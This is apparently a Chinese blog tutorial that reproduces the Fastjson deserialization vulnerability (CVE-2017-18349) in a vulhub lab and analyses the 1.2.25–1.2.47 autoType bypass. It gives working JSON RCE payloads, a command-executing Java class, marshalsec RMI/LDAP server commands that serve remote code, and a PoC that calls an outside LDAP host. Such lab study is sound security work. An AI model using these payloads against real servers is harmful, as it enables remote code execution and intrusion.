Fastjson反序列化漏洞复现
Fastjson 是阿里巴巴开源的一个Java库,用于将Java对象转换为JSON字符串(序列化),以及将JSON字符串转换为Java对象(反序列化),漏洞编号CVE-2017-18349。
漏洞原理
Fastjson 引入了 autoType 功能,允许在反序列化过程中通过 @type
指定一个类的全限定名,Fastjson将会尝试创建该类的实例。
如果服务端反序列化了不可信的JSON数据,攻击者可以构造特定的JSON字符串,使得Fastjson在反序列化时实例化攻击者指定的类,并可能调用该类中的方法,导致远程代码执行。
举个例子:
假设想要利用Fastjson反序列化漏洞来执行远程代码
{
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "rmi://attacker-ip/Exploit",
"autoCommit": true
}
这里的 @type 是告诉Fastjson反序列化时创建 com.sun.rowset.JdbcRowSetImpl 类的实例。
dataSourceName 这是 JdbcRowSetImpl 类的一个属性,可以设置它的值为一个RMI服务器的URL。当Fastjson反序列化这个JSON时,会尝试根据这个URL去指定的RMI服务器中去调用方法。
当Fastjson设置 autoCommit 这个值为 true 时,会触发一个连接操作,进而导致 JdbcRowSetImpl 尝试从RMI服务器加载类。
复现
Fastjson 1.2.24
影响版本:Fastjson < 1.2.25
环境搭建:使用 vulhub 搭建
cd /vulhub/fastjson/1.2.24-rce
docker compose up -d
访问 8090 端口,POST一个json对象,可以更新服务端的json的输出:
首先需要的在本地编译一个class文件,目的是让靶机通过RMI服务远程加载这个类,执行其中的代码。
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success-fastjson"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
class文件编译好以后,在class文件所在目录启用一个 python http 服务,让靶机可以访问到这个文件。
python3 -m http.server 1234 # 监听在1234端口
还需要使用 marshalsec 这个项目来启动一个RMI服务。
git clone https://github.com/mbechler/marshalsec
cd marshalsec
apt-get install maven
mvn clean package -DskipTests # 使用jdk8来构建这个项目
如果maven构建速度太慢,可以在 /usr/share/maven/conf/settings.xml 换源。
启动一个RMI服务器,监听 1099 端口(RMI服务默认在1099端口),并指定加载远程类文件:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.128:1234/#TouchFile" 1099
向靶机POST如下Paylaod,使靶机创建一个JdbcRowSetImpl对象,并调用TouchFile类。
靶机回连本地RMI服务,RMI服务端收到请求:
python服务端收到请求,返回了TouchFile类:
进入到靶机docker环境中,可以看到 /tmp/success-fastjson 文件已经成功创建,利用成功。
除了基于RMI的利用方式,还有基于 LDAP 的利用方式。和RMI的利用方式类似。
还是用 marshalsec, 启动一个LDAP的服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.88.128:1234/#TouchFile" 1099
POST JSON Paylaod:
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.88.128:1099/TouchFile",
"autoCommit":true
}
}
Fastjson 1.2.47
Fastjson在 1.2.24 版本后增加了反序列化白名单,在 1.2.48 以前的版本中,可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
JSON Payload:
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://attacker-ip/Exploit",
"autoCommit":true
}
}
漏洞分析
我的Java基础没那么好,这里就结合其他师傅写的文章浅浅地分析一下。
Fastjson漏洞的几个关键函数:
DefaultJSONParser.parseObject()
解析传入的 json 字符串提取不同的 key 进行后续的处理。
TypeUtils.loadClass()
根据传入的类名,生成类的实例。
JavaBeanDeserializer.Deserialze()
依次调用 @type 中传入类的对象公有 set\get\is 方法。
ParserConfig.checkAutoType()
阿里后续添加的防护函数,用于在 loadclass 前检查传入的类是否合法。
首先来看看 1.2.24 版本,274行此处判断如果含有@type标记,则调用lexer.scanSymbol,返回的ref就是@type的值,然后直接使用TypeUtils.loadClass()来生成类的实例clazz。同时1.2.24版本的autoType是默认开启的,autotype功能允许在JSON字符串中通过@type指定一个类的全限定名,然后在反序列化时创建这个类对象,从而就引发了这个反序列化漏洞。
接着来看看 1.2.25 版本是如何修复的,自从1.2.25起autotype默认为False,同时增加了 checkAutoType 方法,不再是直接加载类,在该方法中进行黑名单校验,同时增加白名单机制。
但是这个防御的措施并不完美,原生的 AutoType 相关检查会被被绕过。
1.2.25-1.2.47 版本补丁绕过
漏洞原理是通过java.lang.Class,将JdbcRowSetImpl类加载到Map中缓存,从而绕过AutoType的检测。
这里有两个版本段:
-
1.2.25-1.2.32 版本:未开启AutoTypeSupport时能成功利用,开启AutoTypeSupport不能利用
-
1.2.33-1.2.47 版本:无论是否开启 AutoTypeSupport,都能成功利用
POC
import com.alibaba.fastjson.JSON;
public class Demo {
public static void main(String[] args) {
String PoC = "{\n" +
" \"a\":{\n" +
" \"@type\":\"java.lang.Class\",\n" +
" \"val\":\"com.sun.rowset.JdbcRowSetImpl\"\n" +
" },\n" +
" \"b\":{\n" +
" \"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\n" +
" \"dataSourceName\":\"ldap://82.156.158.68:1389/EvilClass\",\n" +
" \"autoCommit\":true\n" + " }\n" +
"}";
JSON.parse(PoC);
}
}
参考文章
https://vulhub.org/#/environments/fastjson/1.2.24-rce/
https://github.com/luckyfuture0177/VULOnceMore/blob/main/Java框架/CVE-2017-18349Fastjson反序列化.md
https://www.clementi.top/2023/09/24/Fastjson反序列化漏洞复现/index.html
https://www.freebuf.com/vuls/208339.html
https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
若有错误,欢迎指正!o( ̄▽ ̄)ブ